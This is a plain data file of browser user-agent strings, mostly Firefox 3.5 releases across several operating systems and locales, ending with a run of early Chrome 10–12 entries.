Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.5.9 (de)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618)
Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Mozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.0.04506.648)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB
Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Mozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3;MEGAUPLOAD 1.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 FirePHP/0.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15
Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.12) Gecko/20100824 MRA 5.7 (build 03755) Firefox/3.5.12
Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1
Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6
Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.14 Safari/534.24
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.04 Chromium/11.0.696.0 Chrome/11.0.696.0 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.23 (KHTML, like Gecko) Chrome/11.0.686.3 Safari/534.23
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.669.0 Safari/534.20
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.654.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17
